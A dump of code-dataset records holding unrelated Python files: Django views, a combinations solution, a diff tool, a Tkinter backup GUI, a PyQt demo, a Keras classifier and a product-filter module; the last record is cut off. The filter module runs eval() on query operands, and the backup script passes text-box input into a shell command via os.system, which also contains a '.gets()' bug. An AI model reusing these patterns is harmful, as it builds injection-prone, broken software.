else:\r\n form = QForm(instance=qna)\r\n return render(request, 'staff/QnA.html', {'qform': form})\r\n\r\n\r\n# 답변 수정\r\ndef a_edit(request, pk):\r\n qna = get_object_or_404(QnA, pk=pk)\r\n if request.method == \"POST\":\r\n form = AForm(request.POST, instance=qna)\r\n if form.is_valid():\r\n qna = form.save(commit=False)\r\n qna.user = request.user\r\n qna.save()\r\n return redirect('staff:qna')\r\n else:\r\n form = AForm(instance=qna)\r\n return render(request, 'staff/QnA.html', {'aform': form})\r\n\r\n\r\n# 질문쓰기\r\ndef q_new(request):\r\n if request.method == \"POST\":\r\n form = QForm(request.POST)\r\n if form.is_valid():\r\n qna = form.save(commit=False)\r\n qna.user = request.user\r\n qna.date = timezone.now()\r\n qna.save()\r\n return redirect('staff:qna')\r\n else:\r\n form = QForm()\r\n return render(request, 'staff/QnA.html', {'qform': form})\r\n\r\n\r\n# 응모권 190820 예림\r\ndef ticket(request, pk):\r\n advertisings = Advertising.objects.all().order_by('?')\r\n advertising1 = advertisings[0]\r\n advertising2 = advertisings[1]\r\n tickets = Ticket.objects.all()\r\n user = User.objects.get(id=pk)\r\n user_ticket = user.ticket\r\n if request.method == \"POST\" and 'ticketing' in request.POST:\r\n user.ticket = user.ticket-1\r\n user.ticketing = user.ticketing+1\r\n user.save()\r\n return redirect('staff:ticket', pk=pk)\r\n return render(request, 'staff/ticket.html', {'tickets':tickets, 'user_ticket':user_ticket, 'pk':pk,\r\n 'advertising1':advertising1, 'advertising2':advertising2})\r\n\r\n","sub_path":"staff/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"115723737","text":"\"\"\"\n77. Combinations\n\nGiven two integers n and k, return all possible combinations of k numbers out of 1 ... n.\n\nFor example,\nIf n = 4 and k = 2, a solution is:\n\n[\n [2,4],\n [3,4],\n [2,3],\n [1,2],\n [1,3],\n [1,4],\n]\n\"\"\"\n\nclass Solution(object):\n def combine(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: List[List[int]]\n \"\"\"\n def dfs(n, k, start_number, path, result):\n if len(path) == k:\n result.append(path)\n return\n for number in range(start_number, n):\n dfs(n, k, number + 1, path + [number + 1], result)\n\n result = []\n dfs(n, k, 0, [], result)\n return result\n\n","sub_path":"python/77.py","file_name":"77.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"416546200","text":"#!/usr/bin/python\n# Line-by-line diff comparison\n\nfrom __future__ import print_function\nfrom collections import namedtuple\nfrom string_utils import differences\n\nimport sys\nimport optparse\nimport os\n\n\ntotal_diff = namedtuple('total_diff', ['distance', 'edits', 'removals', 'additions', 'differences'])\n\n\nclass ImmutableList:\n \"\"\"Immutable list object with fundamental operations\n being cons in O(1), as well as unpacking in O(1)\"\"\"\n\n\n def __init__(self, val=None, tl=()):\n if val == None:\n self.ls = tl\n else:\n self.ls = (val, tl)\n\n def head(self):\n val, tail = self.ls\n return val\n\n def tail(self):\n val, tail = self.ls\n return tail\n\n def cons(self, val):\n return ImmutableList(val, self.ls)\n\n def unpack(self):\n return self.ls\n\n def empty(self):\n return self.ls == ()\n\n def to_list(self):\n cp = []\n ls = self.ls\n while ls != ():\n hd, tl = ls\n cp.append(hd)\n ls = tl\n return cp\n\n # Make py3 happy\n def __le__(self, other):\n return self.ls <= other.ls\n\n\ndef _strindex(len, i):\n return len - i\n\ndef diff(a, b):\n table = {(0, 0): total_diff(0, 0, ImmutableList(), ImmutableList(), ImmutableList())}\n\n m = len(a)\n n = len(b)\n for i in range(1, m + 1):\n diff = table[i - 1, 0]\n\n diff2 = total_diff(diff.distance + 1, 0,\n diff.removals.cons((_strindex(m, i), _strindex(n, 0))),\n diff.additions,\n diff.differences)\n table[i, 0] = diff2\n for i in range(1, n + 1):\n diff = table[0, i - 1]\n\n diff2 = total_diff(diff.distance + 1, 0, diff.removals,\n diff.additions.cons((_strindex(m, 0), _strindex(n, i))),\n diff.differences)\n table[0, i] = diff2\n\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if a[_strindex(m, i)] == b[_strindex(n, j)]:\n table[i, j] = table[i - 1, j - 1]\n else:\n inst = table[i, j - 1]\n delt = table[i - 1, j]\n subs = table[i - 1, j - 1]\n\n if delt <= inst and delt <= subs:\n ln = (_strindex(m, i), _strindex(n, j))\n d = total_diff(delt.distance + 1, delt.edits,\n delt.removals.cons(ln), delt.additions, delt.differences)\n elif inst <= delt and inst <= subs:\n ln = (_strindex(m, i), _strindex(n, j))\n d = total_diff(inst.distance + 1, inst.edits,\n inst.removals, inst.additions.cons(ln), inst.differences)\n else:\n ln = (_strindex(m, i), _strindex(n, j))\n d = total_diff(subs.distance + 1,\n subs.edits + len(differences(a[_strindex(m, i)], b[_strindex(n, j)])[0]),\n subs.removals, subs.additions,\n subs.differences.cons(ln))\n\n\n table[i, j] = d\n\n\n diff = table[m, n]\n return total_diff(diff.distance, diff.edits,\n diff.removals.to_list(),\n diff.additions.to_list(),\n diff.differences.to_list())\n\n\ndef colored(s, color='', ignore=False):\n colors = {\n 'r': '\\033[91m',\n 'g': '\\033[92m',\n 'y': '\\033[93m',\n 'c': '\\033[96m',\n 'p': '\\033[95m',\n 'end': '\\033[0m'\n }\n\n if color in colors and not ignore:\n return colors[color] + s + colors['end']\n return s\n\ndef color_line_diff(a, b):\n adiffs, bdiffs = differences(a, b)\n\n x = \"\"\n for i in range(len(a)):\n if i in adiffs:\n x += colored(a[i], 'g')\n else:\n x += a[i]\n y = \"\"\n for i in range(len(b)):\n if i in bdiffs:\n y += colored(b[i], 'r')\n else:\n y += b[i]\n\n return (x, y)\n\ndef star_line_diff(a, b):\n adiffs, bdiffs = differences(a, b)\n\n x = \"\"\n for i in range(len(a)):\n if i in adiffs:\n x += '^'\n else:\n x += ' '\n y = \"\"\n for i in range(len(b)):\n if i in bdiffs:\n y += '^'\n else:\n y += ' '\n\n return (x, y)\n\n\ndef space_pad_right(s, len_is, len_want):\n if len_is < len_want:\n return s + ' ' * (len_want - len_is)\n return s\ndef print_diff(a, b, colors=False, lines=True, eqs=True):\n _, _, removals, additions, diffs = diff(a, b)\n i = 0\n j = 0\n length = str(len(max(a + b, key=len)))\n\n while i < len(a) or j < len(b):\n i\n if (i, j) in diffs:\n if lines:\n print('%3d,%3d: ' % (i + 1, j + 1), end='')\n if colors:\n x, y = color_line_diff(a[i], b[j])\n x = space_pad_right(x, len(a[i]), int(length))\n print((\" | %-\" + length + \"s\\t%-\" + length + \"s\") % (x, y))\n else:\n x, y = star_line_diff(a[i], b[j])\n print((\" | %-\" + length + \"s\\t%-\" + length + \"s\") % (a[i], b[j]))\n if lines:\n l = max(3, max(len(str(i + 1)), len(str(j + 1))))\n spaces = (3 + 2 * l) * ' '\n print(spaces, end='')\n print((' %-' + length + 's\\t%s') % (x, y))\n\n i += 1\n j += 1\n elif (i, j) in additions:\n if lines:\n print('%3d,%3d: ' % (i + 1, j + 1), end='')\n if eqs:\n print((\" + %-\" + length + \"s\\t%-\" + length + \"s\") % (' ', colored(b[j], 'p', not colors)))\n else:\n print((\" + %-\" + length + \"s\") % colored(b[j], 'p', not colors))\n j += 1\n elif (i, j) in removals:\n if lines:\n print('%3d,%3d: ' % (i + 1, j + 1), end='')\n if eqs:\n print((\" - %-\" + length + \"s\\t%-\" + length + \"s\") % (colored(a[i], 'y', not colors), ' '))\n else:\n print((\" - %-\" + length + \"s\") % colored(a[i], 'y', not colors))\n i += 1\n else:\n if eqs:\n if lines:\n print('%3d,%3d: ' % (i + 1, j + 1), end='')\n print((\" = %-\" + length + \"s\\t%-\" + length + \"s\") % (a[i], b[j]))\n i += 1\n j += 1\n\n\ndef is_windows():\n return os.name == 'nt'\n\n\nif __name__ == '__main__':\n parser = optparse.OptionParser(\n usage=\"usage: %prog [options] fileA fileB\",\n description='Side-by side diff program. Takes two input files for arguments, prints their differences ' +\n 'side by side to stdout.\\n\\n Each line contains a character to determine equality or differences.\\n'\n '= means the lines are equivalent, | means a line-difference. +/- signify missing or added lines.')\n parser.add_option('-n', '--nocolor', action='store_true',\n help='turns off color coding (automatically done for files/Windows)\\n'\n + 'prints ^ characters for differences instead')\n\n parser.add_option('-L', '--lines', action='store_true',\n help='prints line numbers as well')\n parser.add_option('-E', '--noequals', action='store_true',\n help='does not print lines that are equal')\n\n (opts, args) = parser.parse_args()\n if len(args) != 2:\n print('Usage: see python diff.py --help')\n exit(1)\n\n colors = not opts.nocolor\n if is_windows() or not sys.stdout.isatty():\n colors = False\n\n a = open(args[0]).readlines()\n b = open(args[1]).readlines()\n a = list(map(lambda x: x[:-1] if x.endswith('\\n') else x, a))\n b = list(map(lambda x: x[:-1] if x.endswith('\\n') else x, b))\n print_diff(a, b, colors, opts.lines, not opts.noequals)\n","sub_path":"diff.py","file_name":"diff.py","file_ext":"py","file_size_in_byte":7946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"154022480","text":"import os \nimport time\nimport tkinter\n\n#函数主体\ndef BackUP():\n global enter_source_dir\n global enter_target_dir\n source_dir = enter_source_dir.get() # get()函数读到该控件的文本框信息\n target_dir=enter_target_dir.gets()\n\n today_dir=target_dir+time.strftime('%Y%m%d')\n #os.sep:根据系统的不同,os.sep也不同,在Linux和Mac下(也可以说是Unix和类Unix系统中),\n #os.sep的值为'/',而在Windows系统中,os.sep的值为'\\'。\n zip_file=today_dir+os.sep+time.strftime('%H%M%S')+'.zip'\n\n zip_command=\"zip -qr \"+zip_file+' '+source_dir\n\n if os.path.exists(today_dir)==0:\n os.mkdir(today_dir)\n if os.system(zip_command)==0: #执行压缩命令,执行成功返回0;\n print(\"zip Successful!\")\n else:\n print(\"error!!\")\n\n\n#Tk界面控件\nroot=tkinter.Tk()\nroot.title(\"BackUp\") \nroot.geometry(\"200x200\") #设定界面大小,不是*\n#第一行的控件\nlb1_source=tkinter.Label(root,text='Source') #第一行文本\nlb1_source.grid(row=0,column=0)\nenter_source_dir=tkinter.Entry(root) #第一行输入框控件\nenter_source_dir.grid(row=0,column=1)\n#第二行的控件\nlb1_target = tkinter.Label(root, text='Target') # 第二行文本\nlb1_target.grid(row=1, column=0)\nenter_target_dir = tkinter.Entry(root) # 第二行输入框控件\nenter_target_dir.grid(row=1, column=1)\n#第三行控件,一个按钮\nrun_backup = tkinter.Button(root, text=\"BackUp\")\nrun_backup.grid(row=3,column=0)\nrun_backup['command'] = BackUP # 将命令绑定在backup()函数上,当点击这个按钮时,就调用指定的backup()函数\n#界面开始\nroot.mainloop()\n","sub_path":"Project/File-BackUp/File-BackUp.py","file_name":"File-BackUp.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"544045412","text":"#!/usr/bin/env python -tt\n# -*- coding: utf-8 -*-\n# from PySide.QtGui import *\nimport sys\n\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\n\n# reload(sys)\n# sys.setdefaultencoding('utf8')\n\ndata_for_tree = {\"tomato\": {\"color\": \"red\", \"ammount\": \"10\", \"note\": \"a note for tomato\", \"price\": \"0.8\"},\n \"banana\": {\"color\": \"yellow\", \"ammount\": \"1\", \"note\": \"b note for banana\", \"price\": \".6\"},\n \"some fruit\": {\"color\": \"unknown\", \"ammount\": \"100\", \"note\": \"some text\", \"price\": \"2.1\"}}\ndata_for_receiver = {\"1\": {\"name\": \"milk\", \"price\": \"3.2\", \"note\": \"I love milk\"},\n \"2\": {\"name\": \"coca-cola\", \"price\": \".8\", \"note\": \"coke forever\"}}\n\n\nclass ProxyModel(QSortFilterProxyModel):\n\n def __init__(self, parent=None):\n super(ProxyModel, self).__init__(parent)\n\n def lessThan(self, left, right):\n leftData = self.sourceModel().data(left)\n rightData = self.sourceModel().data(right)\n try:\n return float(leftData) < float(rightData)\n except ValueError:\n return leftData < rightData\n\n\nclass MainFrame(QWidget):\n def __init__(self):\n QWidget.__init__(self)\n\n self.MyTreeView = QTreeView()\n self.MyTreeViewModel = QStandardItemModel()\n self.MyTreeView.setModel(self.MyTreeViewModel)\n self.most_used_cat_header = ['Name', \"ammount\", \"color\"]\n self.MyTreeViewModel.setHorizontalHeaderLabels(self.most_used_cat_header)\n self.MyTreeView.setSortingEnabled(True)\n\n self.MyTreeView_Fill()\n\n self.receiver_tree = QTreeView()\n self.receiver_model = QStandardItemModel()\n self.receiver_tree.setModel(self.receiver_model)\n self.receiver_tree_header = ['#', 'Name', \"price\"]\n self.receiver_model.setHorizontalHeaderLabels(self.receiver_tree_header)\n\n self.MyTreeView.doubleClicked.connect(self.addToReceiver)\n\n self.receiver_fill()\n\n MainWindow = QHBoxLayout(self)\n MainWindow.addWidget(self.MyTreeView)\n MainWindow.addWidget(self.receiver_tree)\n self.setLayout(MainWindow)\n\n def addToReceiver(self):\n indexes = self.MyTreeView.selectedIndexes()\n index_list = [i.data() for i in self.MyTreeView.selectedIndexes()]\n last_id = max(int(i) for i in data_for_receiver)\n for k in data_for_tree:\n v = data_for_tree[k]\n if [k, v[\"ammount\"], v[\"color\"]] == index_list:\n i = QStandardItem(str(last_id + 1))\n name = QStandardItem(k)\n price = QStandardItem(format(float(v[\"price\"]), \".2f\"))\n tooltip = v[\"note\"]\n name.setToolTip(tooltip)\n item = (i, name, price)\n self.receiver_model.appendRow(item)\n upd = {\"name\": k, \"price\": v[\"price\"], \"note\": v[\"note\"]}\n data_for_receiver[str(last_id + 1)] = upd\n\n def MyTreeView_Fill(self):\n for k in data_for_tree:\n name = QStandardItem(k)\n ammount = QStandardItem(data_for_tree[k][\"ammount\"])\n note = QStandardItem(data_for_tree[k][\"color\"])\n name.setEditable(False)\n tooltip = \"price \" + format(float(data_for_tree[k][\"price\"]), \".2f\") + \"
\"\n tooltip += data_for_tree[k][\"note\"]\n item = (name, ammount, note)\n name.setToolTip(tooltip)\n\n self.MyTreeViewModel.appendRow(item)\n self.MyTreeView.sortByColumn(1, Qt.DescendingOrder)\n proxyModel = ProxyModel(self)\n proxyModel.setSourceModel(self.MyTreeViewModel)\n self.MyTreeView.setModel(proxyModel)\n\n c = 0\n while c < len(self.most_used_cat_header):\n self.MyTreeView.resizeColumnToContents(c)\n c = c + 1\n\n def receiver_fill(self):\n for k in data_for_receiver:\n v = data_for_receiver[k]\n i = QStandardItem(k)\n name = QStandardItem(v[\"name\"])\n price = QStandardItem(format(float(v[\"price\"]), \".2f\"))\n tooltip = v[\"note\"]\n name.setToolTip(tooltip)\n\n item = (i, name, price)\n self.receiver_model.appendRow(item)\n c = 0\n while c < len(self.receiver_tree_header):\n self.receiver_tree.resizeColumnToContents(c)\n c = c + 1\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n main = MainFrame()\n main.show()\n main.move(app.desktop().screen().rect().center() - main.rect().center())\n sys.exit(app.exec_())\n","sub_path":"References/QTreeview_两课树.py","file_name":"QTreeview_两课树.py","file_ext":"py","file_size_in_byte":4552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"328941305","text":"import re\nimport numpy as np\nfrom scipy.io import wavfile\nfrom sklearn import preprocessing\nfrom python_speech_features import mfcc\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Flatten\nfrom keras.preprocessing import sequence\nfrom keras.layers.embeddings import Embedding\n\ndef load_data():\n\tXtrain = []\n\tytrain = []\n\tXdevel = []\n\tydevel = []\n\twith open('arff/ComParE2016_Deception.ComParE.train.arff') as f:\n\t\tfor line in f.readlines():\n\t\t\tif re.match('\\'', line):\n\t\t\t\tlists = line.split(',')\n\t\t\t\tx = np.array(lists[1: -1])\n\t\t\t\tx = x.reshape(1, x.size)\n\t\t\t\tXtrain.extend(x)\n\t\t\t\tif re.match('D', lists[-1]):\n\t\t\t\t\tytrain.append(1)\n\t\t\t\telse:\n\t\t\t\t\tytrain.append(0)\n\twith open('arff/ComParE2016_Deception.ComParE.devel.arff') as f:\n\t\tfor line in f.readlines():\n\t\t\tif re.match('\\'', line):\n\t\t\t\tlists = line.split(',')\n\t\t\t\tx = np.array(lists[1: -1])\n\t\t\t\tx = x.reshape(1, x.size)\n\t\t\t\tXdevel.extend(x)\n\t\t\t\tif re.match('D', lists[-1]):\n\t\t\t\t\tydevel.append(1)\n\t\t\t\telse:\n\t\t\t\t\tydevel.append(0)\n\treturn np.array(Xtrain), np.array(ytrain), np.array(Xdevel), np.array(ydevel)\n\t\ndef train(Xtrain, ytrain, Xdevel, ydevel, maxword):\n\tmodel = Sequential()\n\tmodel.add(Dense(2048, input_shape = (maxword, ), activation = 'relu'))\n\tmodel.add(Dense(512, activation = 'relu'))\n\tmodel.add(Dense(128, activation = 'relu'))\n\tmodel.add(Dense(32, activation = 'relu'))\n\tmodel.add(Dense(1, activation = 'sigmoid'))\n\tmodel.compile(loss = 'binary_crossentropy', optimizer = 'adam', metrics = ['accuracy', 'recall'])\n\tmodel.fit(Xtrain, ytrain, validation_data = (Xdevel, ydevel), epochs = 10, batch_size = 143, verbose = 1, class_weight = 'balanced')\n\treturn model\n\t\ndef test(model, Xtrain, ytrain, Xdevel, ydevel):\n\tprint(model.summary())\n\tscore = model.evaluate(Xtrain, ytrain)\n\tprint(\"Model performance on train dataset\")\n\tprint(score)\n\tprint(\"Model performance on development dataset\")\n\tscore = model.evaluate(Xdevel, ydevel)\n\tprint(score)\n\nXtrain, ytrain, Xdevel, ydevel = load_data()\nscaler = preprocessing.StandardScaler()\nXtrain = scaler.fit_transform(Xtrain)\nXdevel = scaler.fit_transform(Xdevel)\nmodel = train(Xtrain, ytrain, Xdevel, ydevel, Xtrain.shape[1])\ntest(model, Xtrain, ytrain, Xdevel, ydevel)\n","sub_path":"dnn_arff.py","file_name":"dnn_arff.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"184479028","text":"# Given a singly linked list, group all odd nodes together followed by the even nodes. Please note here we are\n# talking about the node number and not the value in the nodes.\n#\n# You should try to do it in place. The program should run in O(1) space complexity and O(nodes) time complexity.\n#\n# Example 1:\n#\n# Input: 1->2->3->4->5->NULL\n# Output: 1->3->5->2->4->NULL\n# Example 2:\n#\n# Input: 2->1->3->5->6->4->7->NULL\n# Output: 2->3->6->7->1->5->4->NULL\n# Note:\n#\n# The relative order inside both the even and odd groups should remain as it was in the input.\n# The first node is considered odd, the second node even and so on ...\n\n# Solution:\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def oddEvenList(self, head: ListNode) -> ListNode:\n odd_list = ListNode(0)\n even_list = ListNode(0)\n odd = odd_list\n even = even_list\n c = 1\n while head:\n if c % 2 == 0:\n even_list.next = head\n even_list = even_list.next\n else:\n odd_list.next = head\n odd_list = odd_list.next\n\n head = head.next\n c += 1\n even_list.next = None\n odd_list.next = even.next\n return odd.next\n","sub_path":"week3/Odd Even Linked List.py","file_name":"Odd Even Linked List.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"399200196","text":"\nimport pandas as pd\nimport numpy as np\n# FOR DETAILED DESCRIPTION OF THE CODE SEE THE README FILE\n\nclass Add_columns(): # This class adds extra columns to the data table \n # these extra columns will be helpful in parsing data easily\n def __init__(self,data): # columns are Ids,discount,brand.name,discount_diff\n \n self.data = data\n \n Ids = []\n for mr in range(len(self.data[\"_id\"])):\n Ids.append(self.data[\"_id\"][mr][\"$oid\"])\n self.data[\"Ids\"] = Ids\n \n ty = []\n basket_price = []\n for x in range(len(self.data[\"price\"])):\n y = self.data[\"price\"][x][\"regular_price\"][\"value\"]\n z = self.data[\"price\"][x][\"offer_price\"][\"value\"]\n basket_price.append(self.data[\"price\"][x][\"basket_price\"][\"value\"])\n ty.append((((y-z)/y)*100))\n self.data[\"discount\"] = ty\n \n \n by = []\n for x in range(len(self.data[\"brand\"])):\n y = self.data[\"brand\"][x][\"name\"]\n by.append(y)\n self.data[\"brand.name\"] = by\n \n \n comp_list = []\n under_list = []\n discount1 = []\n for ry in range(len(self.data[\"similar_products\"])):\n one_product = self.data[\"similar_products\"][ry]\n compt_ids = [*one_product[\"website_results\"]]\n comp_dict = {}\n product_comp_discount= []\n product_comp_list= []\n undercut = []\n for v in compt_ids:\n comp_basket = one_product[\"website_results\"][f\"{v}\"][\"meta\"][\"avg_price\"][\"basket\"]\n our_basket = basket_price[ry]\n\n if comp_basket!=0 :\n\n undercut1 = comp_basket-our_basket\n perc = ((undercut1)/our_basket)*100\n product_comp_discount.append(perc)\n product_comp_list.append(v)\n\n for m,n in zip(range(len(product_comp_list)),range(len(product_comp_discount))):\n comp_dict[product_comp_list[m]]=product_comp_discount[n]\n\n\n comp_list.append(comp_dict) \n\n self.data[\"discount_diff\"] = comp_list\n\n\nclass Filters(Add_columns): # Filter class is a collectiion of all the filter methods\n \n def __init__(self,data,f1=None,f2=None,f3=None):\n super().__init__(data) \n self.f1 = f1 \n self.f2 = f2\n self.f3 = f3\n \n def discount(self):\n \n discount_list = []\n # returns product ids\n qi = self.f1.index(\"discount\")\n discount_list1 = eval(f\"self.data['_id'][self.data['{self.f1[qi]}']{self.f2[qi]}{self.f3[qi]}]\")\n for i in range(len(discount_list1)):\n\n discount_list.append(discount_list1.values[i]['$oid'])\n\n return discount_list\n\n \n def undercut(self): # This is the filter for expensive_list\n \n te = []\n for xv in range(len(self.data[\"discount_diff\"].values)):\n fg = list(((self.data[\"discount_diff\"].values)[xv].values()))\n for z in fg:\n if z<0 :\n te.append(xv)\n break\n \n discount_list = []\n # returns product ids\n for bv in te:\n discount_list1 = (self.data['Ids'])[bv]\n discount_list.append(discount_list1)\n return discount_list\n \n def brand_name(self):\n brand_list = []\n ui = self.f1.index(\"brand.name\")\n brand_list1 = eval(f\"self.data['_id'][self.data['{self.f1[ui]}']{self.f2[ui]}'{self.f3[ui]}']\")\n for i in range(len(brand_list1)):\n brand_list.append(brand_list1.values[i]['$oid'])\n return brand_list\n \n def competition(self):\n \n competition_list = []\n\n ui = self.f1.index(\"competition\")\n for ni in range(len(self.data[\"discount_diff\"])):\n try:\n self.data[\"discount_diff\"][ni][self.f3[ui]]\n except Exception:\n continue\n\n competition_list1 = self.data[\"_id\"][ni][\"$oid\"]\n competition_list.append(competition_list1)\n\n return competition_list\n \n\n def prod_to_dis(self,list1 = None): # It's a simple method for converting product list \n # to corrosponding dicount on that product\n discount_lis = []\n for mr in list1:\n discount_lis.append(self.data[\"discount\"][self.data[\"Ids\"]==mr].values) \n return discount_lis\n \n def discount_diff(self): \n \n product_id = []\n\n ui = self.f1.index(\"discount_diff\")\n\n for i in range(len(self.data[\"discount_diff\"])):\n \n comp = self.data[\"discount_diff\"][i].values()\n for xv in comp:\n if not eval(f\"xv{self.f2[ui]}{self.f3[ui]}\"):\n continue \n else :\n product_id.append(self.data[\"Ids\"][i])\n\n return product_id \n\n\n\nclass Queries(Filters): # This Class has methods for each Query\n \n def __init__(self,data,f1,f2,f3):\n super().__init__(data,f1,f2,f3)\n \n def discounted_products_list(self):\n \n trio = [\"list1\",\"list2\",\"list3\",\"list4\"]\n the_trio = []\n \n try:\n list1 = set(self.discount()) \n except Exception:\n the_trio.append(\"list1\") \n \n try:\n list2 = set(self.brand_name()) \n except Exception:\n the_trio.append(\"list2\")\n \n try:\n list3 = set(self.competition()) \n except Exception:\n the_trio.append(\"list3\")\n\n try:\n list4 = set(self.discount_diff())\n except Exception:\n the_trio.append(\"list4\")\n \n present = list(set(trio)^set(the_trio)) \n\n x = len(present)\n \n if x==4:\n inter2 = (eval(f\"{present[0]}\"))&(eval(f\"{present[1]}\"))\n inter1 = inter2&(eval(f\"{present[2]}\"))\n inter = inter1&(eval(f\"{present[3]}\"))\n \n if x==3:\n inter1 = (eval(f\"{present[0]}\"))&(eval(f\"{present[1]}\"))\n inter = inter1&(eval(f\"{present[2]}\"))\n\n if x==2:\n inter = set(eval(f\"{present[0]}\"))&set(eval(f\"{present[1]}\"))\n\n if x==1:\n inter = set(eval(f\"{present[0]}\"))\n\n return list(inter)\n \n def products_count_avg(self):\n \n trio = [\"list1\",\"list2\",\"list3\",\"list4\"]\n the_trio = []\n \n try:\n list1 = set(self.discount()) \n except Exception:\n the_trio.append(\"list1\") \n try:\n list2 = set(self.brand_name())\n except Exception:\n the_trio.append(\"list2\")\n try:\n list3 = set(self.competition())\n except Exception:\n the_trio.append(\"list3\")\n\n try:\n list4 = set(self.discount_diff())\n except Exception:\n the_trio.append(\"list4\")\n \n present = list(set(trio)^set(the_trio))\n\n x = len(present)\n \n if x==4:\n inter2 = (eval(f\"{present[0]}\"))&(eval(f\"{present[1]}\"))\n inter1 = inter2&(eval(f\"{present[2]}\"))\n inter = inter1&(eval(f\"{present[3]}\"))\n \n if x==3:\n \n inter1 = (eval(f\"{present[0]}\"))&(eval(f\"{present[1]}\"))\n inter = inter1&(eval(f\"{present[2]}\"))\n\n if x==2:\n inter = (eval(f\"{present[0]}\"))&(eval(f\"{present[1]}\"))\n\n if x==1:\n \n inter = (eval(f\"{present[0]}\"))\n \n \n listofarray = (self.prod_to_dis(inter))\n\n count = len(listofarray)\n \n if count == 0:\n return [\"The returned list for these filters is empty.\"]\n else:\n avg = ((sum(listofarray))/count).tolist()\n\n return [f\"The number of discounts for these filters are {count}\",f\"The average discount for these filters is {avg}\"]\n \n def expensive_list(self):\n \n trio = [\"list1\",\"list2\",\"list3\",\"list4\"]\n the_trio = []\n try:\n list1 = set(self.discount())\n except Exception:\n the_trio.append(\"list1\") \n try:\n list2 = set(self.brand_name())\n except Exception:\n the_trio.append(\"list2\")\n try:\n list3 = set(self.competition())\n except Exception:\n the_trio.append(\"list3\")\n\n\n list4 = set(self.undercut())\n\n present = list(set(trio)^set(the_trio))\n\n x = len(present)\n\n if x==4:\n inter2 = (eval(f\"{present[0]}\"))&(eval(f\"{present[1]}\"))\n inter1 = inter2&(eval(f\"{present[2]}\"))\n inter = inter1&(eval(f\"{present[3]}\"))\n\n if x==3:\n inter1 = (eval(f\"{present[0]}\"))&(eval(f\"{present[1]}\"))\n inter = inter1&(eval(f\"{present[2]}\"))\n\n if x==2:\n inter = (eval(f\"{present[0]}\"))&(eval(f\"{present[1]}\"))\n\n if x==1:\n inter = (eval(f\"{present[0]}\"))\n\n\n return list(inter) \n \n \n def competition_discount_diff_list(self):\n \n trio = [\"list1\",\"list2\",\"list3\",\"list4\"]\n the_trio = []\n try:\n list1 = set(self.discount_diff())\n except Exception:\n the_trio.append(\"list1\") \n try:\n list2 = set(self.brand_name())\n except Exception:\n the_trio.append(\"list2\")\n try:\n list3 = set(self.competition())\n except Exception:\n the_trio.append(\"list3\")\n \n try:\n list4 = set(self.discount())\n except Exception:\n the_trio.append(\"list4\")\n\n present = list(set(trio)^set(the_trio))\n\n x = len(present)\n\n if x==4:\n inter2 = (eval(f\"{present[0]}\"))&(eval(f\"{present[1]}\"))\n inter1 = inter2&(eval(f\"{present[2]}\"))\n inter = inter1&(eval(f\"{present[3]}\"))\n\n if x==3:\n inter1 = (eval(f\"{present[0]}\"))&(eval(f\"{present[1]}\"))\n inter = inter1&(eval(f\"{present[2]}\"))\n\n if x==2:\n inter = (eval(f\"{present[0]}\"))&(eval(f\"{present[1]}\"))\n\n if x==1:\n inter = (eval(f\"{present[0]}\"))\n\n\n return list(inter)\n \n\n\nclass Input(Queries): # This class has a method which assigns queries to right query methods\n \n def __init__(self,data,f1,f2,f3,query):\n super().__init__(data,f1,f2,f3)\n self.query = query\n \n def __repr__(self):\n return \"Input({},{},{},{},{})\".format(self.data,self.f1,self.f2,self.f3,f\"{self.query}\")\n \n def get_results(self):\n \n if self.query == \"discounted_products_list\":\n return self.discounted_products_list()\n \n if self.query == \"discounted_products_count|avg_discount\":\n return self.products_count_avg()\n \n if self.query == \"expensive_list\":\n return self.expensive_list()\n \n if self.query == \"competition_discount_diff_list\":\n return self.competition_discount_diff_list()\n \n @classmethod \n def convert(cls,data,q1): # It's a class method for transforming inputs.\n \n cls.q1 = q1\n # cls.data = data\n \n # df = [json.loads(line) for line in open('netaporter_gb_similar.json', 'r')]\n # data=pd.DataFrame(df)\n \n# url2 = 'https://greendeck-datasets-2.s3.amazonaws.com/netaporter_gb_similar.json'\n# data = pd.read_json(url2,lines=True,orient='columns')\n \n # data = pd.read_json(cls.data_file,lines=True,orient='columns') \n\n query = cls.q1[\"query_type\"]\n if query == \"expensive_list\":\n try: \n filters = cls.q1[\"filters\"]\n except Exception:\n f1 = []\n f2 = []\n f3 = []\n return cls(data,f1,f2,f3,f\"{query}\")\n \n \n else :\n \n filters = cls.q1[\"filters\"]\n \n f1 = []\n f2 = []\n f3 = []\n for xc in range(len(filters)):\n fa = filters[xc][\"operand1\"]\n fb = filters[xc][\"operator\"]\n fc = filters[xc][\"operand2\"]\n f1.append(fa)\n f2.append(fb)\n f3.append(fc)\n \n \n return cls(data,f1,f2,f3,f\"{query}\")\n \n","sub_path":"Flask101.py","file_name":"Flask101.py","file_ext":"py","file_size_in_byte":12781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"3226121","text":"from forecast.forms import ContactForm, ForecastForm,FcastAllForm\nfrom django.shortcuts import get_object_or_404, render\nfrom forecast.models import Forecast\nfrom datetime import date,timedelta\nimport datetime\nfrom django.db.models import Avg, Max, Min, Sum\nfrom django.http import 